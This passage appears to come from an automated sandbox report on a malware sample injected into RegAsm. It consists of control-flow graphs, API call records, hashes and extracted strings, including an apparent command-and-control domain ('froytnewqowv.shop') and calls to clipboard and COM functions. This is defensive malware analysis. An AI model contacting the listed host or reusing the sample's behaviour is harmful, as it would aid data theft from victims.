40bc81 122->124 125 40bcc4-40bccf 122->125 123->63 128 40bc90-40bcc2 124->128 126 40bcd5-40bcd9 125->126 127 40bd8e 125->127 129 40bceb-40bcef 126->129 130 40bd90-40bd92 127->130 128->125 128->128 131 40bcf5-40bcfc 129->131 132 40bfdc-40bfe5 call 43a780 129->132 130->132 133 40bd98-40bdba 130->133 134 40bd02 131->134 135 40bcfe-40bd00 131->135 132->117 136 40bdf6-40bdff 133->136 137 40bdbc-40bdbf 133->137 140 40bce0-40bce5 134->140 141 40bd04-40bd06 134->141 135->134 142 40be01-40be0b 136->142 143 40be34-40be36 136->143 139 40bdc0-40bdf4 137->139 139->136 139->139 140->129 140->130 141->140 146 40be17-40be1b 142->146 143->132 145 40be3c-40be44 143->145 147 40be50-40be58 145->147 146->132 148 40be21-40be28 146->148 147->147 149 40be5a-40be5d 147->149 150 40be2a-40be2c 148->150 151 40be2e 148->151 152 40be63-40be65 149->152 153 40bf05-40bf14 149->153 150->151 154 40be10-40be15 151->154 155 40be30-40be32 151->155 156 40bed1-40bed3 152->156 157 40be67-40be70 152->157 158 40bf20-40bf27 153->158 154->143 154->146 155->154 161 40bed5-40beda 156->161 159 40be87-40be94 157->159 158->158 160 40bf29-40bf3f 158->160 163 40be96-40be9e 159->163 164 40beaa-40bebe 159->164 165 40bf41 160->165 166 40bf7d-40bf8d call 40c000 160->166 161->153 162 40bedc-40bee9 161->162 167 40beeb-40bef3 162->167 168 40befe 162->168 170 40bea0-40bea3 163->170 171 40bea5-40bea8 163->171 173 40bec0-40bec8 164->173 174 40be77-40be85 164->174 172 40bf43-40bf47 165->172 166->132 182 40bf8f-40bf9e 166->182 175 40bef5-40bef7 167->175 176 40bef9-40befc 167->176 168->153 170->171 171->164 178 40bf77-40bf7a 172->178 179 40bf49-40bf65 call 40db90 172->179 180 40be72-40be75 173->180 181 40beca-40becf 173->181 174->159 174->161 175->176 176->168 178->166 189 40bf67-40bf6d 179->189 190 40bf6f-40bf75 179->190 180->174 181->180 184 40bfa0-40bfa4 182->184 185 40bfc1-40bfd4 call 43a780 182->185 187 40bfb0-40bfbf 184->187 185->111 192 40bfda 185->192 187->185 187->187 189->172 189->190 190->166 192->117
        APIs
        • LoadLibraryExW.KERNELBASE(66FC64EC,00000000,00000800), ref: 0040B8BC
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID: LibraryLoad
        • String ID: 0625911D5451AC863ECC1A31AADC7148$C6T&$QQ!.$Z.^^$\"Y $froytnewqowv.shop
        • API String ID: 1029625771-3471886239
        • Opcode ID: b8de83478b42807edfbfb77dcae6b9da56dc18adc1b9ec55f59c9e233b6e0b32
        • Instruction ID: 1f1654bdb7cbdd608bfaf90879f2b1bfbfdf568bc53ae3b2ddb7df9b58b85f24
        • Opcode Fuzzy Hash: b8de83478b42807edfbfb77dcae6b9da56dc18adc1b9ec55f59c9e233b6e0b32
        • Instruction Fuzzy Hash: 9912BFB45083409BD3109F15DC907AEBBE1EF96308F148A2EE8D56B392D7798905CF9E

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 193 40cc80-40cee6 194 40cf23-40cf4b 193->194 195 40cee8 193->195 198 40cf52-40cf5b 194->198 199 40d0f2-40d10e 194->199 200 40d1d3-40d1de 194->200 201 40d1e3-40d1f1 194->201 202 40d313-40d33f 194->202 203 40cf74-40cf9a 194->203 204 40d005-40d021 194->204 205 40d1c5-40d1cc 194->205 206 40cff8 194->206 207 40d1f8-40d25d 194->207 208 40cfef-40cff3 194->208 196 40cef0-40cf21 195->196 196->194 196->196 198->203 227 40d110-40d143 199->227 228 40d145-40d17d 199->228 222 40d452 200->222 201->202 201->207 209 40d422-40d431 201->209 210 40d444 201->210 211 40d3a5-40d3b8 201->211 212 40d448 201->212 213 40d390-40d395 201->213 214 40d410-40d415 201->214 215 40d374-40d37e 201->215 216 40d356-40d36d 201->216 217 40d436-40d43d 201->217 218 40d478-40d47f 201->218 219 40d3db-40d403 201->219 220 40d41c 201->220 221 40d3bf-40d3d4 call 43c6e0 201->221 232 40d346-40d34f 202->232 225 40cfd0-40cfe8 203->225 226 40cf9c-40cf9f 203->226 230 40d023 204->230 231 40d065-40d09c 204->231 205->200 205->201 205->202 205->207 205->209 205->210 205->211 205->212 205->213 205->214 205->215 205->216 205->217 205->218 205->219 205->220 205->221 206->204 223 40d290-40d298 207->223 224 40d25f 207->224 229 40d459-40d471 208->229 209->213 210->212 211->210 211->212 211->214 211->217 211->218 211->219 211->220 211->221 212->222 260 40d39f 213->260 214->210 214->212 214->217 214->218 214->220 215->213 216->209 216->210 216->211 216->212 216->213 216->214 216->215 216->217 216->218 216->219 216->220 216->221 217->210 217->212 217->218 238 40d4b0 218->238 239 40d7a0-40d7bc 218->239 240 40d4c1-40d4c7 call 43a780 218->240 241 40d833-40d852 218->241 242 40d486 218->242 243 40d4b8-40d4be call 43a780 218->243 244 40d799-40d79b 218->244 245 40d49c-40d4a3 218->245 246 40d48c-40d49b 218->246 247 40d82c-40d82e 218->247 219->210 219->212 219->214 219->217 219->218 219->220 221->210 221->212 221->214 221->217 221->218 221->219 221->220 222->229 251 40d2c2-40d2d2 223->251 252 40d29a-40d2a2 223->252 250 40d260-40d28e 224->250 225->199 225->200 225->201 225->202 225->204 225->205 225->206 225->207 225->208 234 40cfa0-40cfce 226->234 227->227 227->228 248 40d0e0-40d0ec 228->248 249 40d183 228->249 229->199 229->200 229->201 229->202 229->205 229->207 229->209 229->210 229->211 229->212 229->213 229->214 229->215 229->216 229->217 229->218 229->219 229->220 229->221 235 40d030-40d063 230->235 236 40d0d0-40d0dc 231->236 237 40d09e-40d09f 231->237 232->209 232->210 232->211 232->212 232->213 232->214 232->215 232->216 232->217 232->218 232->219 232->220 232->221 234->225 234->234 235->231 235->235 236->199 266 40d0a0-40d0ce 237->266 238->243 254 40d80a-40d825 239->254 255 40d7be-40d7bf 239->255 240->244 258 40d894-40d8c2 241->258 259 40d854 241->259 242->246 243->240 253 40d94e-40d957 244->253 245->238 245->239 245->241 245->244 245->246 245->247 257 40d945 247->257 248->199 269 40d190-40d1be 249->269 250->223 250->250 271 40d2d4-40d2d6 251->271 272 40d2f6-40d311 251->272 270 40d2b0-40d2c0 252->270 254->241 254->247 287 40db60-40db87 254->287 288 40d980-40d989 254->288 289 40d9c1 254->289 290 40d9e3-40d9ea 254->290 291 40d924-40d926 254->291 292 40d9c7-40d9cb 254->292 293 40d928-40d92f 254->293 294 40d968-40d96a 254->294 295 40d96c-40d975 254->295 296 40d98f 254->296 297 40d9f1-40da4b 254->297 298 40d991 254->298 299 40d9d2-40d9dd 254->299 300 40d936 254->300 301 40d958-40d961 254->301 302 40d99c-40d9ba 254->302 273 40d7c0-40d808 255->273 257->253 275 40d904-40d91d 258->275 276 40d8c4 258->276 274 40d860-40d892 259->274 260->211 266->236 266->266 269->269 281 40d1c0 269->281 270->251 270->270 282 40d2e0-40d2f2 271->282 272->202 273->254 273->273 274->258 274->274 275->287 275->288 275->289 275->290 275->291 275->292 275->293 275->294 275->295 275->296 275->297 275->298 275->299 275->300 275->301 275->302 285 40d8d0-40d902 276->285 281->248 282->282 286 40d2f4 282->286 285->275 285->285 286->272 287->288 287->289 287->294 287->295 287->296 287->298 287->301 287->302 288->296 289->292 290->287 290->288 290->289 290->294 290->295 290->296 290->297 290->298 290->301 290->302 304 40d93c 291->304 292->299 293->287 293->288 293->289 293->290 293->292 293->294 293->295 293->296 293->297 293->298 293->299 293->300 293->301 293->302 305 40d993-40d99a 294->305 295->288 296->298 306 40da82-40da89 297->306 307 40da4d-40da4f 297->307 298->305 299->290 300->304 301->294 301->296 302->288 302->289 302->294 302->295 302->296 302->301 304->257 305->304 314 40dab1-40dac0 306->314 315 40da8b-40da94 306->315 313 40da50-40da80 307->313 313->306 313->313 318 40dac2-40dac4 314->318 319 40dae5-40db0c 314->319 317 40daa0-40daaf 315->317 317->314 317->317 320 40dad0-40dae1 318->320 321 40db52-40db5d 319->321 322 40db0e-40db0f 319->322 320->320 324 40dae3 320->324 321->287 323 40db10-40db50 322->323 323->321 323->323 324->319
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: *M/O$+y-{$5Q}S$6abc$;I+K$C-C/$Y1Y3$[u#w$_=U?$froytnewqowv.shop$p~
        • API String ID: 0-191147265
        • Opcode ID: 235eb8f41b427622067f72eeebc4fddb1cba5d8b5fe5d93c44688bf9b401b56a
        • Instruction ID: fc48a0543df603f45fec8ff12a8c085a20f594a9923345cd7e2eba27ad107f33
        • Opcode Fuzzy Hash: 235eb8f41b427622067f72eeebc4fddb1cba5d8b5fe5d93c44688bf9b401b56a
        • Instruction Fuzzy Hash: 406296B4508345DFD7249F54D890BAFBBB2FF86710F108A2DE5996B290CB349901CF5A
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: #:$:6$froytnewqowv.shop$p~$sq
        • API String ID: 0-2656505239
        • Opcode ID: b8d3c453bf9d974bcbdefaab6e3614b755ac33ba6e33800d31d81d4b13b8e1a0
        • Instruction ID: e326c0b78092f1179307cafdfc488eb50248af47790a0d19bcb8f83c70445e2f
        • Opcode Fuzzy Hash: b8d3c453bf9d974bcbdefaab6e3614b755ac33ba6e33800d31d81d4b13b8e1a0
        • Instruction Fuzzy Hash: FE92BAB4608701DFD714CF64D890B6EBBB1FF8A711F148A2CE5966B690CB34A811CF99

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 512 40c000-40c03a 513 40c073-40c186 512->513 514 40c03c-40c03f 512->514 516 40c1c0-40c1f3 513->516 517 40c188 513->517 515 40c040-40c071 514->515 515->513 515->515 519 40c233-40c24e call 40cc80 516->519 520 40c1f5 516->520 518 40c190-40c1be 517->518 518->516 518->518 524 40c384-40c386 519->524 525 40c254-40c275 519->525 521 40c200-40c231 520->521 521->519 521->521 528 40c582-40c58c 524->528 526 40c277 525->526 527 40c2ae-40c2b4 525->527 529 40c280-40c2ac 526->529 530 40c2c0-40c2ca 527->530 529->527 529->529 531 40c2d1-40c2d9 530->531 532 40c2cc-40c2cf 530->532 533 40c572-40c576 call 43a780 531->533 534 40c2df-40c304 531->534 532->530 532->531 539 40c57b-40c57e 533->539 535 40c306 534->535 536 40c33e-40c349 534->536 538 40c310-40c33c 535->538 540 40c38b 536->540 541 40c34b-40c34f 536->541 538->536 538->538 539->528 543 40c38d-40c38f 540->543 542 40c367-40c36b 541->542 545 40c56a 542->545 546 40c371-40c378 542->546 544 40c395-40c3d6 543->544 543->545 547 40c3d8 544->547 548 40c40e-40c419 544->548 545->533 549 40c37a-40c37c 546->549 550 40c37e 546->550 551 40c3e0-40c40c 547->551 552 40c454 548->552 553 40c41b-40c423 548->553 549->550 554 40c360-40c365 550->554 555 40c380-40c382 550->555 551->548 551->551 557 40c456-40c458 552->557 556 40c437-40c43b 553->556 554->542 554->543 555->554 556->545 558 40c441-40c448 556->558 557->545 559 40c45e-40c483 557->559 560 40c44a-40c44c 558->560 561 40c44e 558->561 562 40c485 559->562 563 40c4be-40c4c5 559->563 560->561 566 40c430-40c435 561->566 567 40c450-40c452 561->567 568 40c490-40c4bc 562->568 564 40c500-40c50c 563->564 565 40c4c7-40c4d4 563->565 570 40c593-40c598 564->570 569 40c4e7-40c4eb 565->569 566->556 566->557 567->566 568->563 568->568 569->545 571 40c4ed-40c4f4 569->571 570->533 572 40c4f6-40c4f8 571->572 573 40c4fa 571->573 572->573 574 40c4e0-40c4e5 573->574 575 40c4fc-40c4fe 573->575 574->569 576 40c511-40c513 574->576 575->574 576->545 577 40c515-40c52b 576->577 577->570 578 40c52d-40c52f 577->578 579 40c533-40c536 578->579 580 40c538-40c558 call 40db90 579->580 581 40c58d 579->581 584 40c562-40c568 580->584 585 40c55a-40c560 580->585 581->570 584->570 585->579 585->584
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: (+$A$WPsWM85KukmjMUsre4jDC_vkIYPgT8CkFWdcUGh8ipk-1724967780-0.0.1.1-/api$~
        • API String ID: 0-987489533
        • Opcode ID: 7cb605134ac94ffdcf6288be40dd188c96069c587b8b6afe075ddef6a9cd403c
        • Instruction ID: 44a5d8f24ed4e4816ddfe326b5df41ea1088b2b54770a45eea7b330fb46f4ede
        • Opcode Fuzzy Hash: 7cb605134ac94ffdcf6288be40dd188c96069c587b8b6afe075ddef6a9cd403c
        • Instruction Fuzzy Hash: 28E1587410C380DBD315DF18C490A2FBBE1AF95758F188A6EE4D9AB391C339D846CB5A

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 657 4365e0-43665d 658 4366ab-4366c5 657->658 659 43665f 657->659 662 4366d6-436720 CoCreateInstance 658->662 663 4366cc 658->663 660 436660-4366a9 659->660 660->658 660->660 662->662 662->663 663->662
        APIs
        • CoCreateInstance.OLE32(00441A50,00000000,00000001,00441A40,00000000), ref: 00436715
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID: CreateInstance
        • String ID:
        • API String ID: 542301482-0
        • Opcode ID: e5a2a0082c67cb5c301fccf9abeaebcbd6283177cfdf17d39ad2cc2ad519dbb3
        • Instruction ID: ea9f0b6cca55687af24dae82e070ca9713baacfb2e686af0d95a4beb36605997
        • Opcode Fuzzy Hash: e5a2a0082c67cb5c301fccf9abeaebcbd6283177cfdf17d39ad2cc2ad519dbb3
        • Instruction Fuzzy Hash: 233169B4110B409BE334CF26C999B53BBF5EB89714F448A1DE5DB4BA80CBB4B4098F95

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 669 43bc78-43bcba 670 43bcec-43bcfd LoadLibraryExW 669->670 671 43bcbc-43bcbf 669->671 673 43bd03-43bd15 670->673 674 43bf1c-43bf24 670->674 672 43bcc0-43bcea 671->672 672->670 672->672 673->674 675 43c57d-43c58e 674->675 676 43c5d5-43c5dd 675->676 677 43c5e7-43c5fa 676->677 677->675 677->676 678 43c343-43c358 call 435cd0 677->678 679 43c700-43c702 677->679 694 43c362-43c36d 678->694 682 43c706-43c70d 679->682 683 43c722-43c73f 682->683 684 43c792 682->684 685 43c7c1 682->685 686 43c7d0-43c7d6 call 43a6f0 682->686 687 43c790 682->687 688 43c7b0-43c7bb 682->688 689 43c7c7-43c7cd call 43a6f0 682->689 690 43c714-43c71b 682->690 691 43c79b-43c7a6 682->691 692 43c7ea-43c7f1 682->692 693 43c7df-43c7e8 call 43a780 682->693 696 43c741 683->696 697 43c77c-43c787 683->697 684->691 686->693 688->685 689->686 690->683 690->684 690->687 690->688 690->691 690->692 690->693 691->688 693->692 694->676 694->679 694->682 694->690 701 43c381-43c3c1 694->701 702 43c374-43c37a 694->702 703 43c4af-43c4d4 call 43e080 694->703 704 43c49d-43c4a8 694->704 706 43c750-43c77a 696->706 697->687 711 43c3c3 701->711 712 43c409-43c43f call 43db30 701->712 702->676 702->679 702->682 702->690 702->701 702->703 717 43c4e4-43c4fe call 43c840 703->717 704->676 704->679 704->682 704->683 704->684 704->685 704->686 704->687 704->688 704->689 704->690 704->691 704->692 704->693 704->703 706->697 706->706 714 43c3d0-43c407 711->714 712->675 712->676 712->677 712->678 712->694 721 43c1a2-43c1ad 712->721 722 43c331-43c33c 712->722 723 43c446-43c44f 712->723 724 43c1c6-43c200 712->724 725 43c1b4-43c1bf 712->725 726 43c468 712->726 714->712 714->714 717->675 721->724 721->725 721->726 722->676 722->678 722->694 722->721 722->724 722->725 722->726 727 43c451 723->727 728 43c456-43c45e 723->728 724->675 724->676 724->717 730 43c31f-43c32a 724->730 725->678 725->694 725->721 725->724 725->725 725->726 726->704 727->728 728->726 730->675 730->676 730->677 730->678 730->694 730->721 730->722 730->724 730->725 730->726
        APIs
        • LoadLibraryExW.KERNELBASE(?,00000000,00000800), ref: 0043BCF4
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID: LibraryLoad
        • String ID:
        • API String ID: 1029625771-0
        • Opcode ID: 5acfd14c27bde9b74bf5aca11f72f78e1ca5bbfd350eb031bc15054e0debc95a
        • Instruction ID: 6a5b91908db97ac0091159e2d275d9b84e4347aafb7fecb6be556b6923d5ccbe
        • Opcode Fuzzy Hash: 5acfd14c27bde9b74bf5aca11f72f78e1ca5bbfd350eb031bc15054e0debc95a
        • Instruction Fuzzy Hash: 9621C0748042558FDB14CFA8C9906BEBBB1AF06301F24459EC59233391D734BA41CBE9

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 739 43c800-43c832 LdrInitializeThunk
        APIs
        • LdrInitializeThunk.NTDLL(0040EF35,?,00000001,?), ref: 0043C82E
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID: InitializeThunk
        • String ID:
        • API String ID: 2994545307-0
        • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
        • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
        • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
        • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 586 40a9a0-40a9b5 call 40aa20 call 43ba30 591 40a9b7 586->591 592 40a9b9-40a9c6 GetCurrentProcess call 431c10 586->592 593 40aa00-40aa0c ExitProcess 591->593 596 40a9c8 592->596 597 40a9ca-40a9e0 GetWindowInfo call 40b810 592->597 598 40a9f9-40a9fe call 43c6c0 596->598 601 40a9e5-40a9e7 597->601 598->593 603 40a9e9 601->603 604 40a9eb-40a9f5 call 40dcf0 call 40cc60 601->604 605 40a9f7 603->605 604->605 605->598
        APIs
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID: Process$CurrentExit
        • String ID:
        • API String ID: 2333725396-0
        • Opcode ID: b203863fcc5dfd2f2068b8a58807d9dee33faf21cb1ad893444914451a0ecebb
        • Instruction ID: 4218e29b3bc86311983865424d116f639c7e788c7b42be7a3867dd50df405cf1
        • Opcode Fuzzy Hash: b203863fcc5dfd2f2068b8a58807d9dee33faf21cb1ad893444914451a0ecebb
        • Instruction Fuzzy Hash: 96F082B061871496CA103B768B0B32E3B546F11348F424E3BFD82711D1DB7C48B6A69F

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 652 43680f-436815 653 4367f0-436801 CoSetProxyBlanket 652->653 654 4367c9 652->654 655 4367cf-4367e6 CoSetProxyBlanket 652->655 656 43680d 652->656 653->656 654->655 655->653 656->652
        APIs
        • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004367E0
        • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,Function_000367F0), ref: 00436801
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID: BlanketProxy
        • String ID:
        • API String ID: 3890896728-0
        • Opcode ID: 1f4c462caab9f6b2ed01f987ea2e79c0f021f0dc3f4c8e4d67c731682aa1e547
        • Instruction ID: 85de96fdc2472c7becba0e1e7cde9433106db14601eb3176dfd388c25d5d3e4d
        • Opcode Fuzzy Hash: 1f4c462caab9f6b2ed01f987ea2e79c0f021f0dc3f4c8e4d67c731682aa1e547
        • Instruction Fuzzy Hash: 84E0FE393D8700BFF2364B50ED17F057665BB0AF02F601564B3867C5E097F176119A48

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 664 436728-436768 665 436797-4367b9 SysAllocString 664->665 666 43676a 664->666 668 4367bd-4367bf 665->668 667 436770-436795 666->667 667->665 667->667
        APIs
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID: AllocString
        • String ID:
        • API String ID: 2525500382-0
        • Opcode ID: d2c6052d94313f16ea65dfe563f55348c8d742d89dbb323326da04f1fcd23508
        • Instruction ID: 5a0618e91a28a85d2f86b60d01bc68a50de2481b0f7dbb12c5016779150b87dc
        • Opcode Fuzzy Hash: d2c6052d94313f16ea65dfe563f55348c8d742d89dbb323326da04f1fcd23508
        • Instruction Fuzzy Hash: B0111570100B819FD370CF29C494A26BBF1FF4A309BA09C1DE1C28B651C776E442CB54

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 731 43a7a2-43a7a9 732 43a812-43a818 RtlFreeHeap 731->732 733 43a7b0-43a7c7 731->733 734 43a810 731->734 735 43a81e-43a823 731->735 732->735 736 43a7c9 733->736 737 43a7fc-43a807 733->737 734->732 738 43a7d0-43a7fa 736->738 737->734 738->737 738->738
        APIs
        • RtlFreeHeap.NTDLL(?,00000000), ref: 0043A818
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID: FreeHeap
        • String ID:
        • API String ID: 3298025750-0
        • Opcode ID: 467f385da2c6dae1b4972b3f25f99549e7419152301e6f524d1777dffb42152c
        • Instruction ID: e58a62a467fcc3cf4ca00239bb9c62a929624cff67e618a81d4e951f87d01d60
        • Opcode Fuzzy Hash: 467f385da2c6dae1b4972b3f25f99549e7419152301e6f524d1777dffb42152c
        • Instruction Fuzzy Hash: 29018F38A40248DFEB00CF64D99069DBB36EB86319F64C0D8C445277A5C332AE53CB84

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 740 43a762-43a774 RtlAllocateHeap
        APIs
        • RtlAllocateHeap.NTDLL(?,00000000), ref: 0043A76B
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        • Opcode ID: 78e65d7e54fbb97d493f955b41e24730cb33fc9e0624615bae75e3f863140746
        • Instruction ID: 97f73e13ff0ba3024f09bf4723230358ed07b21731cc37c5d5ce43716dcac73c
        • Opcode Fuzzy Hash: 78e65d7e54fbb97d493f955b41e24730cb33fc9e0624615bae75e3f863140746
        • Instruction Fuzzy Hash: 8AB09274100A00ABEA155B14DC25F207A25EB44709FA008A8A815854B2C6269836D988
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID: MetricsSystem
        • String ID: eB$ZB$aB$ $&`B$&dB$)YB$:fB$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$MdB$[aB$beB$y[B$YB$^B$`B
        • API String ID: 4116985748-1301689713
        • Opcode ID: ed2d5ffeca8568e32c327981134a743846ad8985eda272e08d3c848a72605f9e
        • Instruction ID: 2be8b3321d8ebc35c174cfe65313f19d7b7ab85f5ee63cbee2d1089338e9952b
        • Opcode Fuzzy Hash: ed2d5ffeca8568e32c327981134a743846ad8985eda272e08d3c848a72605f9e
        • Instruction Fuzzy Hash: 71C17EB000A3849FE770DF15E54878BBBE4BB86348F91891EE4994B354D7B89548CF8B
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: "A1C$*m(o$1Y6[$4`[b$4i<k$56$9M'O$9]-_$:9$;U0W$<I/K$<a[c$=E5G$@qFs$EuEw$IyK{$O!U#$PA$Q1U3$WP$WeQg$]5X7$]i)k$_-]/$h1i?$k>h0$o=K?$x:m<$y5n3$uw
        • API String ID: 0-2269972215
        • Opcode ID: 779dedc07c5897f8f241aca86a09de035cd84d31b5fffd4dc929a5109f8191e5
        • Instruction ID: d94ce0ecc20038e688a02a3dea8145f2d16f1f88ab05816ea4259b122c1fea78
        • Opcode Fuzzy Hash: 779dedc07c5897f8f241aca86a09de035cd84d31b5fffd4dc929a5109f8191e5
        • Instruction Fuzzy Hash: A2821CB410C381CBE334CF25D580B9BBBE1BB86304F208A2DE5ED9B251DB748446CB96
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: "A1C$*m(o$1Y6[$4`[b$4i<k$56$9M'O$9]-_$:9$;U0W$<I/K$<a[c$=E5G$@qFs$EuEw$IyK{$O!U#$PA$Q1U3$WP$WeQg$]5X7$]i)k$_-]/$h1i?$k>h0$o=K?$x:m<$y5n3$uw
        • API String ID: 0-2269972215
        • Opcode ID: 03a559ddfeca7b8391674ecb4c394752d2d459566a40de705f58b8f5d10fe77b
        • Instruction ID: 540a42f5b2c8655fc7ab95859f4cc758c6e179cb56acad334a16f9351a1cbdc7
        • Opcode Fuzzy Hash: 03a559ddfeca7b8391674ecb4c394752d2d459566a40de705f58b8f5d10fe77b
        • Instruction Fuzzy Hash: 64820AB410C381CBE334CF25D590B9BBBE1BB86304F608A2DE5E99B255DB748446CF96
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: %%,?$.W$7$3-)$3zx$7<0?$II$]H$_Z$xHx~$x|}{$nml
        • API String ID: 0-2043650400
        • Opcode ID: 12c331d8b5d8d13416437651b2242e7253393c52a438c8362e62faa65b91cd90
        • Instruction ID: 0c9f797e28dbec0d448f9598e5e34c6ede17afb7957d05b945e290eb3910d0cb
        • Opcode Fuzzy Hash: 12c331d8b5d8d13416437651b2242e7253393c52a438c8362e62faa65b91cd90
        • Instruction Fuzzy Hash: 3382CCB1900658CBCB14CF54C8916EEBBF1FF8A310F68859DD8956B381D339A981CF98
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: $F0l$0 :b$TW{O$X\\h
        • API String ID: 0-3330333084
        • Opcode ID: 28783c5e86bae370d3f07f277f63f548a0e807dc07b87e52ba4ef3c7a26c3c43
        • Instruction ID: f2e49855611ed10df372a98b0efb2f7bf2bb7ee0b35f1a2b90431f64137dff9f
        • Opcode Fuzzy Hash: 28783c5e86bae370d3f07f277f63f548a0e807dc07b87e52ba4ef3c7a26c3c43
        • Instruction Fuzzy Hash: 9BC2CC70205B928FD325CF29C5907A7BBE1AF52304F98485EC4EB5B792C739B845CB98
        APIs
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID: Clipboard$CloseDataLongOpenWindow
        • String ID:
        • API String ID: 1647500905-0
        • Opcode ID: 3dd72b256286a0f18d76cdbb97be187a757415dddf7a079ddd1879fdad43675e
